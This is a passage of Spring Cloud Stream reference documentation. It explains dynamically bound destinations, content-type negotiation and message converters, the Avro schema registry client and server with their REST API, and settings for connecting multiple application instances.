`useNativeDecoding`.\n+\nDefault: `false`.\nerrorChannelEnabled::\nWhen set to `true`, if the binder supports asynchronous send results, send failures are sent to an error channel for the destination.\nSee \"`<<binder-error-channels>>`\" for more information.\n+\nDefault: `false`.\n\n[[dynamicdestination]]\n=== Using Dynamically Bound Destinations\n\nBesides the channels defined by using `@EnableBinding`, Spring Cloud Stream lets applications send messages to dynamically bound destinations.\nThis is useful, for example, when the target destination needs to be determined at runtime.\nApplications can do so by using the `BinderAwareChannelResolver` bean, registered automatically by the `@EnableBinding` annotation.\n\nThe `spring.cloud.stream.dynamicDestinations` property can be used for restricting the dynamic destination names to a known set (whitelisting).\nIf this property is not set, any destination can be bound dynamically.\n\nThe `BinderAwareChannelResolver` can be used directly, as shown in the following example of a REST controller using a path variable to decide the target channel:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n @RequestMapping(path = \"\/{target}\", method = POST, consumes = \"*\/*\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @PathVariable(\"target\") String target,\n @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, target, contentType);\n }\n\n private void sendMessage(String body, String target, Object contentType) {\n resolver.resolveDestination(target).send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n}\n----\n\nNow consider what happens when we start the application on the default port (8080) and make the following requests with curl:\n\n----\ncurl -H \"Content-Type: 
application\/json\" -X POST -d \"customer-1\" http:\/\/localhost:8080\/customers\n\ncurl -H \"Content-Type: application\/json\" -X POST -d \"order-1\" http:\/\/localhost:8080\/orders\n----\n\nThe destinations, 'customers' and 'orders', are created in the broker (in the exchange for Rabbit or in the topic for Kafka) with names of 'customers' and 'orders', and the data is published to the appropriate destinations.\n\nThe `BinderAwareChannelResolver` is a general-purpose Spring Integration `DestinationResolver` and can be injected in other components -- for example, in a router using a SpEL expression based on the `target` field of an incoming JSON message. The following example includes a router that reads SpEL expressions:\n\n[source,java]\n----\n@EnableBinding\n@Controller\npublic class SourceWithDynamicDestination {\n\n @Autowired\n private BinderAwareChannelResolver resolver;\n\n\n @RequestMapping(path = \"\/\", method = POST, consumes = \"application\/json\")\n @ResponseStatus(HttpStatus.ACCEPTED)\n public void handleRequest(@RequestBody String body, @RequestHeader(HttpHeaders.CONTENT_TYPE) Object contentType) {\n sendMessage(body, contentType);\n }\n\n private void sendMessage(Object body, Object contentType) {\n routerChannel().send(MessageBuilder.createMessage(body,\n new MessageHeaders(Collections.singletonMap(MessageHeaders.CONTENT_TYPE, contentType))));\n }\n\n @Bean(name = \"routerChannel\")\n public MessageChannel routerChannel() {\n return new DirectChannel();\n }\n\n @Bean\n @ServiceActivator(inputChannel = \"routerChannel\")\n public ExpressionEvaluatingRouter router() {\n ExpressionEvaluatingRouter router =\n new ExpressionEvaluatingRouter(new SpelExpressionParser().parseExpression(\"payload.target\"));\n router.setDefaultOutputChannelName(\"default-output\");\n router.setChannelResolver(resolver);\n return router;\n }\n}\n----\n\nThe https:\/\/github.com\/spring-cloud-stream-app-starters\/router[Router Sink Application] uses this technique to create the destinations on-demand.\n\nIf the channel names are known in advance, you can configure the producer properties as with any other destination.\nAlternatively, if you register a `NewDestinationBindingCallback<>` bean, it is invoked just before the binding is created.\nThe callback takes the generic type of the extended producer properties used by the binder.\nIt has one method:\n\n[source, java]\n----\nvoid configure(String channelName, MessageChannel channel, ProducerProperties producerProperties,\n T extendedProducerProperties);\n----\n\nThe following example shows how to use the RabbitMQ binder:\n\n[source, java]\n----\n@Bean\npublic NewDestinationBindingCallback<RabbitProducerProperties> dynamicConfigurer() {\n return (name, channel, props, extended) -> {\n props.setRequiredGroups(\"bindThisQueue\");\n extended.setQueueNameGroupOnly(true);\n extended.setAutoBindDlq(true);\n extended.setDeadLetterQueueName(\"myDLQ\");\n };\n}\n----\n\nNOTE: If you need to support dynamic destinations with multiple binder types, use `Object` for the generic type and cast the `extended` argument as needed.\n\n[[content-type-management]]\n== Content Type Negotiation\n\nData transformation is one of the core features of any message-driven microservice architecture. Given that, in Spring Cloud Stream, such data\nis represented as a Spring `Message`, a message may have to be transformed to a desired shape or size before reaching its destination. This is required for two reasons:\n\n. 
To convert the contents of the incoming message to match the signature of the application-provided handler.\n\n. To convert the contents of the outgoing message to the wire format.\n\nThe wire format is typically `byte[]` (that is true for the Kafka and Rabbit binders), but it is governed by the binder implementation.\n\nIn Spring Cloud Stream, message transformation is accomplished with an `org.springframework.messaging.converter.MessageConverter`.\n\nNOTE: As a supplement to the details to follow, you may also want to read the following https:\/\/spring.io\/blog\/2018\/02\/26\/spring-cloud-stream-2-0-content-type-negotiation-and-transformation[blog post].\n\n=== Mechanics\n\nTo better understand the mechanics and the necessity behind content-type negotiation, we take a look at a very simple use case by using the following message handler as an example:\n\n[source, java]\n----\n@StreamListener(Processor.INPUT)\n@SendTo(Processor.OUTPUT)\npublic String handle(Person person) {..}\n----\n\nNOTE: For simplicity, we assume that this is the only handler in the application (we assume there is no internal pipeline).\n\nThe handler shown in the preceding example expects a `Person` object as an argument and produces a `String` type as an output.\nIn order for the framework to succeed in passing the incoming `Message` as an argument to this handler, it has to somehow transform the payload of the `Message` type from the wire format to a `Person` type.\nIn other words, the framework must locate and apply the appropriate `MessageConverter`.\nTo accomplish that, the framework needs some instructions from the user.\nOne of these instructions is already provided by the signature of the handler method itself (`Person` type).\nConsequently, in theory, that should be (and, in some cases, is) enough.\nHowever, for the majority of use cases, in order to select the appropriate `MessageConverter`, the framework needs an additional piece of information.\nThat missing piece is `contentType`.\n\nSpring Cloud Stream provides three mechanisms to define `contentType` (in order of precedence):\n\n. *HEADER*: The `contentType` can be communicated through the `Message` itself. By providing a `contentType` header, you declare the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *BINDING*: The `contentType` can be set per destination binding by setting the `spring.cloud.stream.bindings.input.content-type` property.\n+\nNOTE: The `input` segment in the property name corresponds to the actual name of the destination (which is \u201cinput\u201d in our case). This approach lets you declare, on a per-binding basis, the content type to use to locate and apply the appropriate `MessageConverter`.\n\n. *DEFAULT*: If `contentType` is not present in the `Message` header or the binding, the default `application\/json` content type is used to\nlocate and apply the appropriate `MessageConverter`.
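\n\nFor instance, the HEADER mechanism is nothing more than a header on the outgoing message. The following minimal sketch (the `Person` payload and the surrounding class are illustrative) shows how a producer might declare it explicitly:\n\n[source, java]\n----\nimport org.springframework.messaging.Message;\nimport org.springframework.messaging.MessageHeaders;\nimport org.springframework.messaging.support.MessageBuilder;\nimport org.springframework.util.MimeTypeUtils;\n\npublic class ContentTypeHeaderExample {\n\n public Message<Person> toJsonMessage(Person person) {\n // The header declared here takes precedence over both the\n // per-binding content type and the application\/json default.\n return MessageBuilder.withPayload(person)\n .setHeader(MessageHeaders.CONTENT_TYPE, MimeTypeUtils.APPLICATION_JSON)\n .build();\n }\n}\n----\n\nAs mentioned earlier, the preceding list also demonstrates the order of precedence in case of a tie. 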
For example, a header-provided content type takes precedence over any other content type.\nThe same applies for a content type set on a per-binding basis, which essentially lets you override the default content type.\nHowever, it also provides a sensible default (which was determined from community feedback).\n\nAnother reason for making `application\/json` the default stems from the interoperability requirements driven by distributed microservices architectures, where producer and consumer not only run in different JVMs but can also run on different non-JVM platforms.\n\nWhen the non-void handler method returns, if the return value is already a `Message`, that `Message` becomes the payload. However, when the return value is not a `Message`, the new `Message` is constructed with the return value as the payload while inheriting\nheaders from the input `Message` minus the headers defined or filtered by `SpringIntegrationProperties.messageHandlerNotPropagatedHeaders`.\nBy default, there is only one header set there: `contentType`. This means that the new `Message` does not have the `contentType` header set, thus ensuring that the `contentType` can evolve.\nYou can always opt out by returning a `Message` from the handler method, where you can inject any header you wish.\n\nIf there is an internal pipeline, the `Message` is sent to the next handler by going through the same process of conversion. However, if there is no internal pipeline or you have reached the end of it, the `Message` is sent back to the output destination.\n\n==== Content Type versus Argument Type\n\nAs mentioned earlier, for the framework to select the appropriate `MessageConverter`, it requires argument type and, optionally, content type information.\nThe logic for selecting the appropriate `MessageConverter` resides with the argument resolvers (`HandlerMethodArgumentResolvers`), which trigger right before the invocation of the user-defined handler method (which is when the actual argument type is known to the framework).\nIf the argument type does not match the type of the current payload, the framework delegates to the stack of the\npre-configured `MessageConverters` to see if any one of them can convert the payload.\nAs you can see, the `Object fromMessage(Message<?> message, Class<?> targetClass);`\noperation of the `MessageConverter` takes `targetClass` as one of its arguments.\nThe framework also ensures that the provided `Message` always contains a `contentType` header.\nWhen no `contentType` header is already present, it injects either the per-binding `contentType` header or the default `contentType` header.\nThe combination of `contentType` and argument type is the mechanism by which the framework determines whether a message can be converted to a target type.\nIf no appropriate `MessageConverter` is found, an exception is thrown, which you can handle by adding a custom `MessageConverter` (see \"`<<spring-cloud-stream-overview-user-defined-message-converters>>`\").\n\nBut what if the payload type matches the target type declared by the handler method? In this case, there is nothing to convert, and the\npayload is passed unmodified. 
While this sounds pretty straightforward and logical, keep in mind handler methods that take a `Message<?>` or `Object` as an argument.\nBy declaring the target type to be `Object` (which is an `instanceof` everything in Java), you essentially forfeit the conversion process.\n\nNOTE: Do not expect `Message` to be converted into some other type based only on the `contentType`.\nRemember that the `contentType` is complementary to the target type.\nIf you wish, you can provide a hint, which `MessageConverter` may or may not take into consideration.\n\n==== Message Converters\n\n`MessageConverters` define two methods:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<?> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\nIt is important to understand the contract of these methods and their usage, specifically in the context of Spring Cloud Stream.\n\nThe `fromMessage` method converts an incoming `Message` to an argument type.\nThe payload of the `Message` could be any type, and it is\nup to the actual implementation of the `MessageConverter` to support multiple types.\nFor example, some JSON converter may support the payload type as `byte[]`, `String`, and others.\nThis is important when the application contains an internal pipeline (that is, input -> handler1 -> handler2 ->. . . -> output) and the output of the upstream handler results in a `Message` which may not be in the initial wire format.\n\nHowever, the `toMessage` method has a stricter contract and must always convert `Message` to the wire format: `byte[]`.\n\nSo, for all intents and purposes (and especially when implementing your own converter), you can regard the two methods as having the following signatures:\n\n[source, java]\n----\nObject fromMessage(Message<?> message, Class<?> targetClass);\n\nMessage<byte[]> toMessage(Object payload, @Nullable MessageHeaders headers);\n----\n\n=== Provided MessageConverters\n\nAs mentioned earlier, the framework already provides a stack of `MessageConverters` to handle most common use cases.\nThe following list describes the provided `MessageConverters`, in order of precedence (the first `MessageConverter` that works is used):\n\n. `ApplicationJsonMessageMarshallingConverter`: Variation of the `org.springframework.messaging.converter.MappingJackson2MessageConverter`. Supports conversion of the payload of the `Message` to\/from POJO for cases when `contentType` is `application\/json` (DEFAULT).\n. `TupleJsonMessageConverter`: *DEPRECATED* Supports conversion of the payload of the `Message` to\/from `org.springframework.tuple.Tuple`.\n. `ByteArrayMessageConverter`: Supports conversion of the payload of the `Message` from `byte[]` to `byte[]` for cases when `contentType` is `application\/octet-stream`. It is essentially a pass-through and exists primarily for backward compatibility.\n. `ObjectStringMessageConverter`: Supports conversion of any type to a `String` when `contentType` is `text\/plain`.\nIt invokes Object\u2019s `toString()` method or, if the payload is `byte[]`, a new `String(byte[])`.\n. `JavaSerializationMessageConverter`: *DEPRECATED* Supports conversion based on java serialization when `contentType` is `application\/x-java-serialized-object`.\n. `KryoMessageConverter`: *DEPRECATED* Supports conversion based on Kryo serialization when `contentType` is `application\/x-java-object`.\n. `JsonUnmarshallingConverter`: Similar to the `ApplicationJsonMessageMarshallingConverter`. 
It supports conversion of any type when `contentType` is `application\/x-java-object`.\nIt expects the actual type information to be embedded in the `contentType` as an attribute (for example, `application\/x-java-object;type=foo.bar.Cat`).\n\nWhen no appropriate converter is found, the framework throws an exception. When that happens, you should check your code and configuration and ensure you did not miss anything (that is, ensure that you provided a `contentType` by using a binding or a header).\nHowever, most likely, you have found an uncommon case (such as a custom `contentType`, perhaps) that the current stack of provided `MessageConverters`\ndoes not know how to convert. If that is the case, you can add a custom `MessageConverter`. See <<spring-cloud-stream-overview-user-defined-message-converters>>.\n\n[[spring-cloud-stream-overview-user-defined-message-converters]]\n=== User-defined Message Converters\n\nSpring Cloud Stream exposes a mechanism to define and register additional `MessageConverters`.\nTo use it, implement `org.springframework.messaging.converter.MessageConverter`, configure it as a `@Bean`, and annotate it with `@StreamMessageConverter`.\nIt is then added to the existing stack of `MessageConverters`.\n\nNOTE: It is important to understand that custom `MessageConverter` implementations are added to the head of the existing stack.\nConsequently, custom `MessageConverter` implementations take precedence over the existing ones, which lets you override as well as add to the existing converters.\n\nThe following example shows how to create a message converter bean to support a new content type called `application\/bar`:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n @StreamMessageConverter\n public MessageConverter customMessageConverter() {\n return new MyCustomMessageConverter();\n }\n}\n\npublic class MyCustomMessageConverter extends AbstractMessageConverter {\n\n public MyCustomMessageConverter() {\n super(new MimeType(\"application\", \"bar\"));\n }\n\n @Override\n protected boolean supports(Class<?> clazz) {\n return (Bar.class.equals(clazz));\n }\n\n @Override\n protected Object convertFromInternal(Message<?> message, Class<?> targetClass, Object conversionHint) {\n Object payload = message.getPayload();\n return (payload instanceof Bar ? 
payload : new Bar((byte[]) payload));\n }\n}\n----\n\nSpring Cloud Stream also provides support for Avro-based converters and schema evolution.\nSee \"`<<schema-evolution>>`\" for details.\n\n[[schema-evolution]]\n== Schema Evolution Support\n\nSpring Cloud Stream provides support for schema evolution so that data can evolve over time and still work with older or newer producers and consumers, and vice versa.\nMost serialization models, especially the ones that aim for portability across different platforms and languages, rely on a schema that describes how the data is serialized in the binary payload.\nIn order to serialize the data and then to interpret it, both the sending and receiving sides must have access to a schema that describes the binary format.\nIn certain cases, the schema can be inferred from the payload type on serialization or from the target type on deserialization.\nHowever, many applications benefit from having access to an explicit schema that describes the binary data format.\nA schema registry lets you store schema information in a textual format (typically JSON) and makes that information accessible to various applications that need it to receive and send data in binary format.\nA schema is referenceable as a tuple consisting of:\n\n* A subject that is the logical name of the schema\n* The schema version\n* The schema format, which describes the binary format of the data\n\nThe following sections go through the details of the various components involved in the schema evolution process.\n\n=== Schema Registry Client\n\nThe client-side abstraction for interacting with schema registry servers is the `SchemaRegistryClient` interface, which has the following structure:\n\n[source,java]\n----\npublic interface SchemaRegistryClient {\n\n SchemaRegistrationResponse register(String subject, String format, String schema);\n\n String fetch(SchemaReference schemaReference);\n\n String fetch(Integer id);\n\n}\n----
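\n\nAs a usage sketch (the subject name and version are illustrative, the package names reflect the `spring-cloud-stream-schema` module as we understand it, and error handling is omitted), registering a schema and fetching it back by reference might look like the following:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.schema.SchemaReference;\nimport org.springframework.cloud.stream.schema.client.SchemaRegistryClient;\n\npublic class SchemaRegistryClientSketch {\n\n public void registerAndFetch(SchemaRegistryClient client, String avroDefinition) {\n // Register the schema under a subject; the server assigns the version\n client.register(\"user\", \"avro\", avroDefinition);\n\n // Fetch it back by reference (subject, version, format)\n String fetched = client.fetch(new SchemaReference(\"user\", 1, \"avro\"));\n }\n}\n----\n\nSpring Cloud Stream provides out-of-the-box implementations for interacting with its own schema server and for interacting with the Confluent Schema Registry.\n\nA client for the Spring Cloud Stream schema registry can be configured by using the `@EnableSchemaRegistryClient` annotation, as follows:\n\n[source,java]\n----\n @EnableBinding(Sink.class)\n @SpringBootApplication\n @EnableSchemaRegistryClient\n public static class AvroSinkApplication {\n ...\n }\n----\n\nNOTE: The default converter is optimized to cache not only the schemas from the remote server but also the results of the `parse()` and `toString()` methods, which are quite expensive.\nBecause of this, it uses a `DefaultSchemaRegistryClient` that does not cache responses.\nIf you intend to change the default behavior, you can use the client directly in your code and override it to the desired outcome.\nTo do so, you have to add the property `spring.cloud.stream.schemaRegistryClient.cached=true` to your application properties.\n\n==== Schema Registry Client Properties\n\nThe Schema Registry Client supports the following properties:\n\n`spring.cloud.stream.schemaRegistryClient.endpoint`:: The location of the schema server.\nWhen setting this, use a full URL, including protocol (`http` or `https`), port, and context path.\n+\nDefault:: `http:\/\/localhost:8990\/`\n`spring.cloud.stream.schemaRegistryClient.cached`:: Whether the client should cache schema server responses.\nNormally set to `false`, as the caching happens in the message converter.\nClients using the schema registry client should set this to `true`.\n+\nDefault:: 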
`false`\n\n=== Avro Schema Registry Client Message Converters\n\nFor applications that have a `SchemaRegistryClient` bean registered with the application context, Spring Cloud Stream auto-configures an Apache Avro message converter for schema management.\nThis eases schema evolution, as applications that receive messages can get easy access to a writer schema that can be reconciled with their own reader schema.\n\nFor outbound messages, if the content type of the channel is set to `application\/*+avro`, the `MessageConverter` is activated, as shown in the following example:\n\n[source,properties]\n----\nspring.cloud.stream.bindings.output.contentType=application\/*+avro\n----\n\nDuring the outbound conversion, the message converter tries to infer the schema of each outbound message (based on its type) and register it to a subject (based on the payload type) by using the `SchemaRegistryClient`.\nIf an identical schema is already found, then a reference to it is retrieved.\nIf not, the schema is registered, and a new version number is provided.\nThe message is sent with a `contentType` header by using the following scheme: `application\/[prefix].[subject].v[version]+avro`, where `prefix` is configurable and `subject` is deduced from the payload type.\n\nFor example, a message of the type `User` might be sent as a binary payload with a content type of `application\/vnd.user.v2+avro`, where `user` is the subject and `2` is the version number.\n\nWhen receiving messages, the converter infers the schema reference from the header of the incoming message and tries to retrieve it. The schema is used as the writer schema in the deserialization process.\n\n==== Avro Schema Registry Message Converter Properties\n\nIf you have enabled the Avro-based schema registry client by setting `spring.cloud.stream.bindings.output.contentType=application\/*+avro`, you can customize the behavior of the registration by setting the following properties.\n\nspring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled:: Enable if you want the converter to use reflection to infer a Schema from a POJO.\n+\nDefault: `false`\n+\nspring.cloud.stream.schema.avro.readerSchema:: Avro compares schema versions by looking at a writer schema (origin payload) and a reader schema (your application payload). See the https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[Avro documentation] for more information. If set, this overrides any lookups at the schema server and uses the local schema as the reader schema.\n+\nDefault: `null`\n+\nspring.cloud.stream.schema.avro.schemaLocations:: Registers any `.avsc` files listed in this property with the Schema Server.\n+\nDefault: `empty`\n+\nspring.cloud.stream.schema.avro.prefix:: The prefix to be used on the Content-Type header.\n+\nDefault: `vnd`
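\n\nPutting these together, the following sketch (the schema location is a placeholder) pre-registers a local `.avsc` file and pins it as the reader schema:\n\n[source,properties]\n----\nspring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled=true\nspring.cloud.stream.schema.avro.schemaLocations=classpath:schemas\/User.avsc\nspring.cloud.stream.schema.avro.readerSchema=classpath:schemas\/User.avsc\n----\n\n=== Apache Avro Message Converters\n\nSpring Cloud Stream provides support for schema-based message converters through its `spring-cloud-stream-schema` module.\nCurrently, the only serialization format supported out of the box for schema-based message converters is Apache Avro, with more formats to be added in future versions.\n\nThe `spring-cloud-stream-schema` module contains two types of message converters that can be used for Apache Avro serialization:\n\n* Converters that use the class information of the serialized or deserialized objects or a schema with a location known at startup.\n* Converters that use a schema registry. 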
They locate the schemas at runtime and dynamically register new schemas as domain objects evolve.\n\n=== Converters with Schema Support\n\nThe `AvroSchemaMessageConverter` supports serializing and deserializing messages either by using a predefined schema or by using the schema information available in the class (either reflectively or contained in the `SpecificRecord`).\nIf you provide a custom converter, the default `AvroSchemaMessageConverter` bean is not created.\n\nTo use a custom converter, you can simply add it to the application context, optionally specifying one or more `MimeTypes` with which to associate it.\nThe default `MimeType` is `application\/avro`.\n\nIf the target type of the conversion is a `GenericRecord`, a schema must be set.\n\nThe following example shows how to configure a converter in a sink application by registering the Apache Avro `MessageConverter` without a predefined schema.\nIn this example, note that the mime type value is `avro\/bytes`, not the default `application\/avro`.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n return new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n }\n}\n----\n\nConversely, the following application registers a converter with a predefined schema (found on the classpath):\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@SpringBootApplication\npublic static class SinkApplication {\n\n ...\n\n @Bean\n public MessageConverter userMessageConverter() {\n AvroSchemaMessageConverter converter = new AvroSchemaMessageConverter(MimeType.valueOf(\"avro\/bytes\"));\n converter.setSchemaLocation(new ClassPathResource(\"schemas\/User.avro\"));\n return converter;\n }\n}\n----\n\n=== Schema Registry Server\n\nSpring Cloud Stream provides a schema registry server implementation.\nTo use it, you can add the `spring-cloud-stream-schema-server` artifact to your project and use the `@EnableSchemaRegistryServer` annotation, which adds the schema registry server REST controller to your application.\nThis annotation is intended to be used with Spring Boot web applications, and the listening port of the server is controlled by the `server.port` property.\nThe `spring.cloud.stream.schema.server.path` property can be used to control the root path of the schema server (especially when it is embedded in other applications).\nThe `spring.cloud.stream.schema.server.allowSchemaDeletion` boolean property enables the deletion of a schema. 
By default, this is disabled.\n\nThe schema registry server uses a relational database to store the schemas.\nBy default, it uses an embedded database.\nYou can customize the schema storage by using the http:\/\/docs.spring.io\/spring-boot\/docs\/current-SNAPSHOT\/reference\/htmlsingle\/#boot-features-sql[Spring Boot SQL database and JDBC configuration options].\n\nThe following example shows a Spring Boot application that enables the schema registry:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableSchemaRegistryServer\npublic class SchemaRegistryServerApplication {\n public static void main(String[] args) {\n SpringApplication.run(SchemaRegistryServerApplication.class, args);\n }\n}\n----\n\n==== Schema Registry Server API\n\nThe Schema Registry Server API consists of the following operations:\n\n* `POST \/` -- see \"`<<spring-cloud-stream-overview-registering-new-schema>>`\"\n* `GET \/{subject}\/{format}\/{version}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format-version>>`\"\n* `GET \/{subject}\/{format}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-subject-format>>`\"\n* `GET \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-retrieve-schema-id>>`\"\n* `DELETE \/{subject}\/{format}\/{version}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject-format-version>>`\"\n* `DELETE \/schemas\/{id}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-id>>`\"\n* `DELETE \/{subject}` -- see \"`<<spring-cloud-stream-overview-deleting-schema-subject>>`\"\n\n[[spring-cloud-stream-overview-registering-new-schema]]\n===== Registering a New Schema\n\nTo register a new schema, send a `POST` request to the `\/` endpoint.\n\nThe `\/` endpoint accepts a JSON payload with the following fields:\n\n* `subject`: The schema subject\n* `format`: The schema format\n* `definition`: The schema definition\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition
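\n\nFor example (the host, port, and truncated definition are illustrative), such a registration request with curl might look like the following:\n\n[source]\n----\ncurl -X POST http:\/\/localhost:8990\/ \\\n -H \"Content-Type: application\/json\" \\\n -d '{\"subject\":\"user\",\"format\":\"avro\",\"definition\":\"...\"}'\n----\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format-version]]\n===== Retrieving an Existing Schema by Subject, Format, and Version\n\nTo retrieve an existing schema by subject, format, and version, send a `GET` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-subject-format]]\n===== Retrieving an Existing Schema by Subject and Format\n\nTo retrieve an existing schema by subject and format, send a `GET` request to the `\/{subject}\/{format}` endpoint.\n\nIts response is a list of schemas, with each schema object in JSON having the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema definition\n\n[[spring-cloud-stream-overview-retrieve-schema-id]]\n===== Retrieving an Existing Schema by ID\n\nTo retrieve a schema by its ID, send a `GET` request to the `\/schemas\/{id}` endpoint.\n\nIts response is a schema object in JSON, with the following fields:\n\n* `id`: The schema ID\n* `subject`: The schema subject\n* `format`: The schema format\n* `version`: The schema version\n* `definition`: The schema 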
definition\n\n[[spring-cloud-stream-overview-deleting-schema-subject-format-version]]\n===== Deleting a Schema by Subject, Format, and Version\n\nTo delete a schema identified by its subject, format, and version, send a `DELETE` request to the `\/{subject}\/{format}\/{version}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-id]]\n===== Deleting a Schema by ID\n\nTo delete a schema by its ID, send a `DELETE` request to the `\/schemas\/{id}` endpoint.\n\n[[spring-cloud-stream-overview-deleting-schema-subject]]\n===== Deleting a Schema by Subject\n`DELETE \/{subject}`\n\nDelete existing schemas by their subject.\n\nNOTE: This note applies to users of Spring Cloud Stream 1.1.0.RELEASE only.\nSpring Cloud Stream 1.1.0.RELEASE used the table name, `schema`, for storing `Schema` objects. `Schema` is a keyword in a number of database implementations.\nTo avoid any conflicts in the future, starting with 1.1.1.RELEASE, we have opted for the name `SCHEMA_REPOSITORY` for the storage table.\nAny Spring Cloud Stream 1.1.0.RELEASE users who upgrade should migrate their existing schemas to the new table before upgrading.\n\n==== Using Confluent's Schema Registry\n\nThe default configuration creates a `DefaultSchemaRegistryClient` bean.\nIf you want to use the Confluent schema registry, you need to create a bean of type `ConfluentSchemaRegistryClient`, which supersedes the one configured by default by the framework. The following example shows how to create such a bean:\n\n[source,java]\n----\n@Bean\npublic SchemaRegistryClient schemaRegistryClient(@Value(\"${spring.cloud.stream.schemaRegistryClient.endpoint}\") String endpoint){\n ConfluentSchemaRegistryClient client = new ConfluentSchemaRegistryClient();\n client.setEndpoint(endpoint);\n return client;\n}\n----\nNOTE: The `ConfluentSchemaRegistryClient` is tested against Confluent platform version 4.0.0.\n\n=== Schema Registration and Resolution\n\nTo better understand how Spring Cloud Stream registers and resolves new schemas and its use of Avro schema comparison features, we provide two separate subsections:\n\n* \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"\n* \"`<<spring-cloud-stream-overview-schema-resolution-process>>`\"\n\n[[spring-cloud-stream-overview-schema-registration-process]]\n==== Schema Registration Process (Serialization)\n\nThe first part of the registration process is extracting a schema from the payload that is being sent over a channel.\nAvro types such as `SpecificRecord` or `GenericRecord` already contain a schema, which can be retrieved immediately from the instance.\nIn the case of POJOs, a schema is inferred if the `spring.cloud.stream.schema.avro.dynamicSchemaGenerationEnabled` property is set to `true`.\n\n.Schema Writer Resolution Process\nimage::schema_resolution.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nOnce a schema is obtained, the converter loads its metadata (version) from the remote server.\nFirst, it queries a local cache. 
If no result is found, it submits the data to the server, which replies with versioning information.\nThe converter always caches the results to avoid the overhead of querying the Schema Server for every new message that needs to be serialized.\n\n.Schema Registration Process\nimage::registration.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nWith the schema version information, the converter sets the `contentType` header of the message to carry the version information -- for example: `application\/vnd.user.v1+avro`.\n\n[[spring-cloud-stream-overview-schema-resolution-process]]\n==== Schema Resolution Process (Deserialization)\n\nWhen reading messages that contain version information (that is, a `contentType` header with a scheme like the one described under \"`<<spring-cloud-stream-overview-schema-registration-process>>`\"), the converter queries the Schema server to fetch the writer schema of the message.\nOnce it has found the correct schema of the incoming message, it retrieves the reader schema and, by using Avro's schema resolution support, reads it into the reader definition (setting defaults and any missing properties).\n\n.Schema Reading Resolution Process\nimage::schema_reading.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nNOTE: You should understand the difference between a writer schema (the application that wrote the message) and a reader schema (the receiving application).\nWe suggest taking a moment to read https:\/\/avro.apache.org\/docs\/1.7.6\/spec.html[the Avro terminology] and understand the process.\nSpring Cloud Stream always fetches the writer schema to determine how to read a message.\nIf you want to get Avro's schema evolution support working, you need to make sure that a `readerSchema` was properly set for your application.\n\n== Inter-Application Communication\n\nSpring Cloud Stream enables communication between applications. Inter-application communication is a complex issue spanning several concerns, as described in the following topics:\n\n* \"`<<spring-cloud-stream-overview-connecting-multiple-application-instances>>`\"\n* \"`<<spring-cloud-stream-overview-instance-index-instance-count>>`\"\n* \"`<<spring-cloud-stream-overview-partitioning>>`\"\n\n[[spring-cloud-stream-overview-connecting-multiple-application-instances]]\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of \"`adjacent`\" applications.\n\nSuppose a design calls for the Time Source application to send data to the Log Sink application. 
You could use a common destination named `ticktock` for bindings within both applications.\n\nTime Source (that has the channel name `output`) would set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink (that has the channel name `input`) would set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n[[spring-cloud-stream-overview-instance-index-instance-count]]\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of an HDFS sink application, all three instances have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed through Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and 